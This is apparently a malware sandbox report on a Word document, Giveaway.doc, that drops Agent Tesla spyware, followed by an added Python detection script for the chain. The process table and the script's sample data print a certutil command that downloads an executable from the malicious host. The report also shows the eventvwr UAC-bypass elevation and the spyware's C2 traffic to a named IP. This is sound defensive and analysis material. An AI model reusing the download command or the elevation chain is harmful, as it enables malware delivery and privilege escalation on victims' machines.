URL: | http://alobitanbd.com/css/Giveaway.doc |
Full analysis: | https://app.any.run/tasks/013d3345-1022-4029-a92d-d72a0154acea |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about its victims' actions by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where the malware is sold. |
Analysis date: | April 25, 2019, 08:55:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 733E737F2F381A6029D77EE4865B6C15 |
SHA1: | CD3093BCE99ECBEA62EA6D231B54EE3F9DE8845C |
SHA256: | 0CF2227986C0EDA34AECF817578046CD5E97D78B9E773D6FE04C01EDA755364D |
SSDEEP: | 3:N1KfuQEzUUWKa1KGn:C2QEyAGn |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2308 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | — | explorer.exe
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Internet Explorer | Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3808 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2308 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe
User: admin | Company: Microsoft Corporation | Integrity Level: LOW | Description: Internet Explorer | Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
1692 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | svchost.exe
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Word | Version: 14.0.6024.1000
4088 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE
User: admin | Company: Microsoft Corporation | Integrity Level: LOW | Description: Microsoft Word | Exit code: 0 Version: 14.0.6024.1000
2672 | "C:\Windows\System32\certutil.exe" -urlcache -split -f http://alobitanbd.com/css/Easter.exe C:\Users\admin\AppData\Local\Temp\upadte.exe | C:\Windows\System32\certutil.exe | — | WINWORD.EXE
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: CertUtil.exe | Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1972 | C:\Users\admin\AppData\Local\Temp\upadte.exe | C:\Users\admin\AppData\Local\Temp\upadte.exe | — | WINWORD.EXE
User: admin | Company: HappyOrNot | Integrity Level: MEDIUM | Description: K&R Transporte | Exit code: 0 Version: 5.6.14.17
2336 | "C:\Users\admin\AppData\Local\Temp\upadte.exe" | C:\Users\admin\AppData\Local\Temp\upadte.exe | — | upadte.exe
User: admin | Company: HappyOrNot | Integrity Level: MEDIUM | Description: K&R Transporte | Version: 5.6.14.17
1952 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | — | upadte.exe
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Event Viewer Snapin Launcher | Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED) Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1684 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | — | upadte.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH | Description: Event Viewer Snapin Launcher | Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2756 | "C:\Users\admin\AppData\Local\Temp\upadte.exe" | C:\Users\admin\AppData\Local\Temp\upadte.exe | — | eventvwr.exe
User: admin | Company: HappyOrNot | Integrity Level: HIGH | Description: K&R Transporte | Version: 5.6.14.17
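The process tree above contains three links worth alerting on: WINWORD.EXE spawning certutil.exe with -urlcache -f and an http URL (certutil used as a downloader), the dropped upadte.exe launching the auto-elevating eventvwr.exe (first instance exits with 0xC000042C, STATUS_ELEVATION_REQUIRED; the second runs at HIGH integrity), and eventvwr.exe then spawning upadte.exe at HIGH rather than its normal mmc.exe child. The registry write that redirects the mscfile handler is not visible on this page, so the detection keys on the process relationships alone. The following is an added example, not part of the ANY.RUN report or of any product: the SAMPLE records are constructed from the process table (the parent PIDs of the two eventvwr.exe instances and of PID 2336 are assumed, since the page names only the parent image), and the field names and rule names are this example's own.

```python
"""Process-tree rules for the certutil -> payload -> eventvwr -> elevated payload chain.

Added example, not code from the ANY.RUN report. SAMPLE is constructed from the
process table on this page; field and rule names are assumptions of this example.
"""
from dataclasses import dataclass
from typing import Optional

# NTSTATUS the first eventvwr.exe instance exited with (3221226540 decimal).
STATUS_ELEVATION_REQUIRED = 0xC000042C
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
RANK = {"LOW": 0, "MEDIUM": 1, "HIGH": 2}


@dataclass
class Proc:
    pid: int
    image: str                 # executable basename, lower-case
    cmdline: str
    integrity: str             # LOW / MEDIUM / HIGH
    parent_pid: Optional[int]
    exit_code: Optional[int] = None


# Constructed from the report's process table; parent PIDs marked (assumed) are
# inferred from the parent image name, which is all the page gives.
SAMPLE = [
    Proc(1692, "winword.exe", '"C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE" -Embedding', "MEDIUM", None),
    Proc(2672, "certutil.exe", '"C:\\Windows\\System32\\certutil.exe" -urlcache -split -f '
         'http://alobitanbd.com/css/Easter.exe C:\\Users\\admin\\AppData\\Local\\Temp\\upadte.exe', "MEDIUM", 1692, 0),
    Proc(1972, "upadte.exe", 'C:\\Users\\admin\\AppData\\Local\\Temp\\upadte.exe', "MEDIUM", 1692, 0),
    Proc(2336, "upadte.exe", '"C:\\Users\\admin\\AppData\\Local\\Temp\\upadte.exe"', "MEDIUM", 1972),          # (assumed)
    Proc(1952, "eventvwr.exe", '"C:\\Windows\\System32\\eventvwr.exe"', "MEDIUM", 2336, STATUS_ELEVATION_REQUIRED),  # (assumed)
    Proc(1684, "eventvwr.exe", '"C:\\Windows\\System32\\eventvwr.exe"', "HIGH", 2336, 0),                      # (assumed)
    Proc(2756, "upadte.exe", '"C:\\Users\\admin\\AppData\\Local\\Temp\\upadte.exe"', "HIGH", 1684),
]


def ancestors(p, by_pid):
    """Yield parent, grandparent, ... of p until the tree root."""
    cur = by_pid.get(p.parent_pid)
    while cur is not None:
        yield cur
        cur = by_pid.get(cur.parent_pid)


def detect(procs):
    """Return (pid, rule) hits, in process order, for the four rules below."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.parent_pid)
        cmd = p.cmdline.lower()

        # Rule 1: certutil fetching from a URL. An Office parent is what separates
        # a dropper from an administrator refreshing a CRL, so it gets its own name.
        if p.image == "certutil.exe" and "-urlcache" in cmd and "http" in cmd:
            rule = "certutil_download_from_office" if parent and parent.image in OFFICE_APPS \
                else "certutil_download"
            hits.append((p.pid, rule))

        # Rule 2: eventvwr.exe normally hands off to mmc.exe; any other child means
        # the .msc file handler was pointed at something else (eventvwr UAC bypass).
        if parent and parent.image == "eventvwr.exe" and p.image != "mmc.exe":
            hits.append((p.pid, "eventvwr_child_not_mmc"))

        # Rule 3: a HIGH-integrity process whose ancestry contains the same image at
        # lower integrity: a medium-integrity binary got itself relaunched elevated.
        if p.integrity == "HIGH":
            for a in ancestors(p, by_pid):
                if a.image == p.image and RANK[a.integrity] < RANK["HIGH"]:
                    hits.append((p.pid, "self_relaunch_elevated"))
                    break

        # Rule 4: an instance that exits STATUS_ELEVATION_REQUIRED and a HIGH-integrity
        # twin of the same image from the same parent: the auto-elevate path was taken.
        if p.exit_code == STATUS_ELEVATION_REQUIRED:
            twins = [q for q in procs
                     if q.parent_pid == p.parent_pid and q.image == p.image and q.integrity == "HIGH"]
            if twins:
                hits.append((twins[0].pid, "elevation_required_then_high"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE):
        print(pid, rule)
```

Rule 2 is the one that survives a change of payload name or download path: whatever the .msc handler is redirected to, it appears as a non-mmc.exe child of eventvwr.exe. Rules 3 and 4 need integrity level and exit code in the telemetry (Sysmon event 1 carries the former; the latter comes from process-termination events), so treat them as confirmation rather than the primary trigger.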
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2308 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | — | — | —
2308 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | —
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8400.tmp.cvr | — | — | —
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{32EB617C-2111-40F4-8779-C626A530E157} | — | — | —
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{2A7E2EA4-7E6C-4BD1-B799-412F583EF9F4} | — | — | —
3808 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | 053373F0A4E08855E84D506DC305E0AC | C253982CC7B0F0605D111C1659F96DD37D70A6F21474B6F93EE4CDE7D00FFD88
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9DD0EF24-B9CA-4786-BFA0-47020F2C5E14}.FSD | binary | 916E3CA30C78057D6C2341CC9C372989 | 1DF81938F862DACA6857479AC53BC31638139CA6749AFED58C35B80E06290410
1692 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 6B53A73D285C0956B474A05C5D6A1ABD | 939C3A58B347732C85AABCD631B7EFA72D442DE016CAF0CCB2691E60F57C38C9
3808 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini | ini | 4A3DEB274BB5F0212C2419D3D8D08612 | 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3808 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | 195A3FAFA2D32D50291D66CFEF0CBB5D | 2A2DE509FE9F09F5E9B6894F277C1DC95466090A838E2DA252FF72849EFB8DC8
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1692 | WINWORD.EXE | HEAD | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | — | — | suspicious |
1692 | WINWORD.EXE | OPTIONS | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/ | US | — | — | suspicious |
3808 | iexplore.exe | GET | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | document | 18.8 Kb | suspicious |
1692 | WINWORD.EXE | HEAD | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | — | — | suspicious |
972 | svchost.exe | PROPFIND | — | 192.185.77.10:80 | http://alobitanbd.com/css/ | US | — | — | suspicious |
972 | svchost.exe | PROPFIND | — | 192.185.77.10:80 | http://alobitanbd.com/css/ | US | — | — | suspicious |
2336 | upadte.exe | POST | 500 | 185.117.73.142:80 | http://185.117.73.142//inc/298d59738c5d32.php | NL | — | — | malicious |
1692 | WINWORD.EXE | GET | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | document | 18.8 Kb | suspicious |
1692 | WINWORD.EXE | HEAD | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | compressed | 18.8 Kb | suspicious |
972 | svchost.exe | PROPFIND | 301 | 192.185.77.10:80 | http://alobitanbd.com/css | US | html | 298 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2308 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2336 | upadte.exe | 185.117.73.142:80 | — | Host Sailor Ltd. | NL | malicious |
2672 | certutil.exe | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
1692 | WINWORD.EXE | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
972 | svchost.exe | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
3808 | iexplore.exe | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
Domain | IP | Reputation
---|---|---
www.bing.com | | whitelisted
alobitanbd.com | | suspicious
PID | Process | Class | Message |
---|---|---|---|
1692 | WINWORD.EXE | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
2672 | certutil.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2672 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
2672 | certutil.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
972 | svchost.exe | Web Application Attack | ET WEB_CLIENT Possible HTTP 405 XSS Attempt (External Source) |
3808 | iexplore.exe | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
2336 | upadte.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla |
2336 | upadte.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla |
2336 | upadte.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla |